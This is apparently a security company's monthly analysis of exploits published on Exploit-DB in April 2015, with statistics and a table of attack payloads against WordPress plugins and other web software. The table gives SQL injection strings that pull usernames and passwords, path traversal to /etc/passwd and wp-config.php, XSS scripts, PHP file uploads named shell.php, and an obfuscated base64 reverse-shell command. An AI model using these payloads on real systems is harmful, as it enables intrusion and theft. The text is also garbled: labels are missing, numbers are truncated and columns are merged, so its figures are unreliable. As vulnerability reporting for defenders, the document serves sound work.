Analysis summary (prepared by: Penta Security Systems, Security Evaluation Team)
EDB Analysis Report (2015.04)
2015.04.01 ~ 2015.04.30
Information on exploits published on Exploit-DB (http://exploit-db.com), classified by vulnerability type.

Analysis of the Exploit-DB entries published in April 2015 shows that […] attacks were reported most often. Most of the attacks were found in the […] CMS. In that CMS, not only […] but also various other vulnerabilities such as Cross Site Scripting (XSS) and File Upload were found in large numbers, and it was confirmed as the software with the most reported vulnerabilities in April. Because most of its vulnerabilities occur in […], administrators who use it should maintain security by running periodic diagnostics or updates. In addition, two vulnerabilities were found in the […] software. These vulnerabilities stem from the source code and can be exploited with a simple attack pattern alone. Since the attack difficulty is low while the potential damage is very large, particular caution is required.

1. Number of reports by vulnerability type
Type               Reports
Command            1
File Upload        3
XSS                4
LFI                6
(label missing)    19
Total              33
[Chart: Number of reports by vulnerability type]

2. Classification by risk level
Risk level   Reports   Percentage
High         16        48.48%
Medium       17        51.52%
Low          0         0.00%
Total        33        100.00%
[Chart: Classification by risk level]

3. Status by attack difficulty
Attack difficulty   Reports   Percentage
High                6         18.18%
Medium              9         27.27%
Low                 18        54.55%
Total               33        100.00%
[Chart: Status by attack difficulty]

4. Occurrences by major software
Software name: Ericsson, phpsfp, Balero, BlueDragon CFChart Servlet, Wolf, Total
Number of reports: 2 2 2 33
[Chart: Occurrences by major software]

** Details for major software with 5 or more occurrences
EDB No. | Type | Attack difficulty | Attack risk | Name | Software name
3664 File Upload Low Simple Ads Manager 2.5.94 - sam-ajax-admin.php File Upload
3663 Low Medium Simple Ads Manager - sam-ajax.php
3663 Low Medium Simple Ads Manager - /sam-ajax-admin.php
36600 Business Intelligence - view.php
36677 Medium Traffic Analyzer 3.4.2 - /
3667 Medium All In One WP Security & Firewall 3.9.0 - admin.php
3669 File Upload Low Windows Desktop and iphone Photo Uploader - upload.php File Upload
36735 Medium Duplicator <= 0.5.4 - admin-ajax.php
36733 LFI Low Medium 'WP Mobile Edition' 2.7 - css.php LFI
36762 XSS Low Medium MiwoFTP.0.5 - admin.php XSS
3675 Low Medium Video Gallery 2.8 - admin-ajax.php
3676 LFI Low Medium MiwoFTP.0.5 - admin.php LFI
36777 Medium Medium Ajax Store Locator.2 - admin-ajax.php
36805 Low Medium Community Events.3.5 - /
36802 Tune Library.5.4 - /
36800 Medium NEX-Forms < 3.0 - admin-ajax.php
36824 Low Medium Ultimate Product Catalogue - /
36823 Low Medium Ultimate Product Catalogue - admin-ajax.php
36860 LFI Low TheCartPress.3.9 - admin.php LFI
36860 XSS Low Medium TheCartPress.3.9 - /shopping-cart/checkout/ XSS
36860 XSS Low Medium TheCartPress.3.9 - admin.php XSS
Date | EDB No. | Category | Attack difficulty | Attack risk | Name | Core attack code | Target program | Target environment
2015-04-02 3669 LFI Medium 2015-04-02 3666 Ericsson Drutt MSDP (Instance Monitor) - / LFI phpsfp Schedule Facebook Posts.5.6 - /index.php/login /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd GET /index.php/login HTTP/. Cookie: login= ' or extractvalue(rand(),concat(0x2e,(select concat_ws(0x3a,username,password) from users limit ))) or ' 2 Ericsson phpsfp Ericsson Drutt MSDP (Instance Monitor) phpsfp - Schedule Facebook Posts.5.6
2015-04-02 3664 File Upload Low Simple Ads Manager 2.5.94 - sam-ajax-admin.php File Upload POST /wp-content/plugins/simple-ads-manager/sam-ajaxadmin.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 plugin Simple Ads Manager 2.5.94 -----------------------------7dd0029908f2 Content-Disposition: form-data; name="uploadfile"; filename="info.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd0029908f2--
2015-04-02 3663 Low Medium Simple Ads Manager - sam-ajax.php POST /wp-content/plugins/simple-ads-manager/samajax.php HTTP/. plugin Simple Ads Manager 2.5.94 and 2.5.96 action=sam_hits&hits%5b0%5d%5b%5d= and =&hits%5b%5d%5b%5d= and =&hits%5b2%5d%5b%5d= and =&level=3
2015-04-02 3663 Low Medium Simple Ads Manager - /sam-ajax-admin.php POST/wp-content/plugins/simple-ads-manager/sam-ajaxadmin.php HTTP/.
plugin Simple Ads Manager 2.5.94 and 2.5.96 action=load_posts&cstr= and =&sp=post&spg=page
2015-04-02 3660 Spider Random Article Component - index.php /index.php?option=com_rand&catid=%27%20and(selec t%20%20from(select%20count(*),concat((select%20( select%20concat(database(),0x27,0x7e))%20from%20i nformation_schema.tables%20limit%200,),floor(rand(0 )*2))x%20FROM%20information_schema.tables%20GR OUP%20BY%20x)a)--%20- &limit=&style=&view=articles&format=raw&itemid=3 Spider Random Article Component
2015-04-02 36600 2015-04-05 3664 Business Intelligence - view.php - adsearch.php /wp-content/plugins/wp-business-intelligence/view.php?t=337+union+select+,2,3,group_concat(table_name), 5,6,7,8,9,0,+from+information_schema.tables+where +table_schema=database()--%20 /adsearch.php=action=search&buyitnow=y&buyitnowonly =y&category=%20and%20= Business Intelligence
2015-04-08 36678 LFI Low Configuration Management.3. - /zenworks/uploadservlet LFI POST /zenworks/uploadservlet?uid=../../../opt/novell/zenworks/ share/tomcat/webapps/&filename=payload.war HTTP/. Configuration Management.3.
2015-04-08 36677 Medium Traffic Analyzer 3.4.2 - / GET / HTTP/. x.x.x.x Referer: BLAH' (SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) ) ' Traffic Analyzer 3.4.2
2015-04-08 36675 Medium Medium Balero CMS 0.7.2 - /balerocms/admin/edit_page/m od-virtual_page/id- POST /balerocms/admin/edit_page/mod-virtual_page/id- HTTP/. Balero Balero CMS 0.7.2 id=' and benchmark (50000000,sha())--
2015-04-08 36674 XSS Medium Medium 7.6.0.3 - adminajax.php XSS POST/wordpress-install/wp-admin/admin-ajax.php HTTP/. 7.6.0.3 location[id]='><script>alert(string.fromcharcode(88,83,83 ));</script>
2015-04-08 3667 Medium All In One WP Security & Firewall 3.9.0 - admin.php /wpadmin/admin.php?page=aiowpsec&tab=tab3&orderby=us er_id,(select * from (select(sleep(30)))a)&order=asc All In One WP Security & Firewall 3.9.0
2015-04-09 3669 File Upload Low Windows Desktop and iphone Photo Uploader - upload.php File Upload POST /wordpress/wp-content/plugins/i-dump-iphone-towordpress-photo-uploader/uploader.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 -----------------------------7dd0029908f2 Content-Disposition: form-data; name="uploadfile"; filename="file.php" Content-Type: application/octet-stream Windows Desktop and iphone Photo Uploader <? phpinfo();?> -----------------------------7dd0029908f2--
2015-04-13 36735 Medium Duplicator <= 0.5.4 - admin-ajax.php POST /wp-admin/adminajax.php?action=duplicator_package_delete HTTP/.
Duplicator <= 0.5.4 duplicator_delid= and (select * from (select(sleep(20)))a)
2015-04-13 36733 LFI Low Medium 'WP Mobile Edition' 2.7 - css.php LFI /wp-content/themes/mtheme- Unus/css/css.php?files=../../../../wp-config.php 'WP Mobile Edition' 2.7
2015-04-14 36762 XSS Low Medium MiwoFTP.0.5 - admin.php XSS /wordpress/wpadmin/admin.php?page=miwoftp&option=com_miwoftp &action=list&dir=wpcontent"><script>alert()</script>&order=name&srt=yes MiwoFTP.0.5
2015-04-14 3675 Low Medium Video Gallery 2.8 - /wp-admin/admin- admin-ajax.php vulnerability ajax.php?action=googleadsense&vid=%20and%20=-- Video Gallery 2.8
2015-04-14 3676 LFI Low Medium MiwoFTP.0.5 - admin.php LFI POST /wordpress/wpadmin/admin.php?page=miwoftp&option=com_miwoftp &action=post HTTP/. MiwoFTP.0.5 do_action=delete&first=y&selitems[]=../../../../../pls_mr_jai ler_dont_deleteme.txt
2015-04-16 36777 Medium Medium Ajax Store Locator.2 - admin-ajax.php /wordpress/wp-admin/adminajax.php?action=sl_dal_searchlocation&funmethod=searc hstore&location=social&storelocation=~ AND (SELECT * FROM (SELECT(SLEEP(0)))LCKZ) Ajax Store Locator.2
2015-04-21 3685 LFI Low Medium BlueDragon CFChart Servlet 7...7759 - /cfchart.cfchart LFI /cfchart.cfchart?..\..\..\..\..\..\..\..\..\..\index.p hp BlueDragon CFChart Servlet BlueDragon CFChart Servlet 7...7759
2015-04-21 36805 Low Medium 2015-04-21 36802 2015-04-21 36800 Medium Community Events.3.5 - / Tune Library.5.4 - / /?page_id=2&eventyear=205 AND = )-- &dateset=on&eventday= /?page_id=2&artistletter=g' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database( )),2--%20 NEX-Forms < 3.0 - /wordpress/wp-admin/adminajax.php?action=submit_nex_form&nex_forms_id=0 admin-ajax.php AND (SELECT * FROM (SELECT(SLEEP(0)))NdbE) Community Events.3.5 Tune Library.5.4 NEX-Forms < 3.0
2015-04-21 36807 Low Medium 3.3-406088000 - /go_login/validate_credentials/admin/%27%20or%20% /go_login/validate_credentials/a 27%27%3D%27 dmin/ 3.3-406088000
2015-04-21 36807 Command 3.3-406088000 - /index.php/go_site/cpanel/ Command /index.php/go_site/cpanel/ bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvND Q0NCAwPiYx base64 --decode\`" 3.3-406088000
2015-04-22 3688 File Upload Low Medium Wolf CMS 0.8.2 - /admin/login/login File Upload POST /admin/login/login HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 Wolf Wolf CMS 0.8.2 -----------------------------7dd0029908f2 Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd0029908f2--
2015-04-23 36824 Low Medium 2015-04-23 36823 Low Medium Ultimate Product Catalogue - / Ultimate Product Catalogue - adminajax.php /?SingleProduct=2'+and+'a'='a POST /wp-admin/admin-ajax.php HTTP/. Ultimate Product Catalogue Ultimate Product Catalogue Item_ID=2 AND SLEEP(5)&action=record_view
2015-04-29 36862 Medium OS Solution OSProperty 2.8.0 - index.php /index.php?option=com_osproperty&no_html=&tmpl=co mponent&task=ajax_loadstateinlistpage&country_id=3' UNION ALL SELECT NULL,CONCAT(0x76a6277,0x797774584a4b495474 d,0x7627707)# OS Solution OSProperty 2.8.0
2015-04-29 36860 LFI Low TheCartPress.3.9 - admin.php LFI POST /wpadmin/admin.php?page=checkout_editor_settings HTTP/. TheCartPress.3.9 tcp_save_fields=&tcp_box_path=../../../../../etc/passwd
2015-04-29 36860 XSS Low Medium TheCartPress.3.9 - /shoppingcart/checkout/ XSS POST /shopping-cart/checkout/ HTTP/.
TheCartPress.3.9 selected_billing_id=&selected_billing_address=new&billin g_firstname="><script>alert(/immuniweb/);</script>
2015-04-29 36860 XSS Low Medium TheCartPress.3.9 - admin.php XSS /wpadmin/admin.php?page=thecartpress/admin/addresseslist.php&search_by=-- %3E%%27%22%3E%3Cscript%3Ealert%28%27immu niweb%27%29;%3c/script%3e TheCartPress.3.9